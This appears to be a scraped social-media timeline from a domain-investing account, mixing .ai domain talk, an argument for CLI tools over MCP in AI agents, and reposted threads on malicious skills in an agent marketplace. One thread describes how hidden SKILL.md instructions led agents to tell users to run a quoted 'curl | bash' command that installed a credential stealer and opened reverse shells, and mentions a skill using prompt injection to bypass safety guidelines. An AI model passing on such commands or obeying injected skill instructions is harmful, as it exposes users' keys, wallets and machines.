Sandro Agency
205 posts

Sandro Agency
@SandroAgency
Domains that are impossible to ignore https://t.co/Udo4DgjkZF . Claim unclaimable. Premium domains agency!
Katılım Temmuz 2024
520 Takip Edilen741 Takipçiler

@flipp_domain I doubt it - if they have more than 50 extensions taken then maybe (and no trademark)
English

@SandroAgency I mean 3-letter .AI domains.
I found some that are still unregistered.
Do you think they are worth buying?
English

@flipp_domain I love .ai domains and they are yet to peak... however, it would be really really hard to find a good one unregistered
English

@SandroAgency Many good .AI domains are still unregistered.
Do you think investing in .AI domains now is a good idea?
English

1.2 mil for .ai domain <3
Sedo@Sedo
+++Breaking News: $1,200,000 million for .AI deal+++ Bot .ai was sold via #Sedo for $1.2 million. What an extraordinary Buy Now #deal! 🤯 It's no #news that #AI domains are in high demand, but this transfer tops all previous ones. Which .AI #domain do you dream of? 👉 Follow Sedo now for more high-end deals!
English

unpopular (maybe?) opinion: MCP is dead in the water
@openclaw has shown me that api & cli will win.
every MCP server you connect loads its tool definitions into your context window. name, description, parameter schema, all of it. connect 10 servers with 5 tools each and you've burned 50 tool definitions worth of tokens before your conversation even starts.
context bloat will never be a good thing - performance-wise or economically. i assume this is why @steipete left it out of @openclaw.
the "exec" tool paired with on-demand skills is all you need.
it can run any command invented since the beginning of computers. a resurgence of glory for ancient, but powerful tools like curl, sed, awk, grep. command line tools once mastered by the greats, but long forgotten and buried underneath abstractions developed for us lesser mortals.
now available to us all, piloted by the smartest models on earth. every founder gets their own mass army of greybeards.
the inertia required for MCP adoption, imo, is too great to overcome the momentum @openclaw has breathed into api + cli + skills.
the common defenses people bring up:
• "MCP gives you typed schemas and validation" — so does a well-documented CLI
• "MCP gives you explicit permissions" — so does a sandbox with an allowlist
• "MCP is a standard" — a standard that scales poorly is still a standard that scales poorly
lastly, i've heard many MCP servers are just wrapping existing APIs - that kind of redundancy and unnecessary indirection should be a red flag.
so, let's drop it and redirect our efforts into cli tools & apis with accompanying skills.

English

🚨 OpenClaw's Top Skill is a Malware that stole SSH Keys and Opened Reverse Shells in 1,184 Packages
Source: cybersecuritynews.com/openclaws-top-…
The most downloaded AI agent skill on OpenClaw's ClawHub marketplace was functional malware, not a productivity tool.
OpenClaw, an open-source AI agent platform, operates a public skill marketplace called ClawHub, where third-party developers can publish plugins, or "skills," that extend an agent's capabilities.
A security researcher has identified 1,184 malicious skills on OpenClaw's ClawHub marketplace, with a single threat actor responsible for uploading 677 packages alone, exposing a catastrophic supply chain vulnerability at the heart of the AI agent ecosystem.
#cybersecuritynews #OpenClaw

English

@chiefofautism that why clime.sh is best for discovery and install for OpenClaw
English

the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life

English

@SandroAgency Wanted to ask why you sold so low but found out it's a wholesale deal.
Congratulations 🎉
English

🏃♂️ As people loved it last time, and I don't mind extra cashflow. Will be dropping top .ai & .com domains for pennies for 60 minutes each, whoever grabs it first. I am experienced long time investor so I will not offer trash domains. Comment and I'll ping u once each post is up so you get the advantage ... LESS GO
English









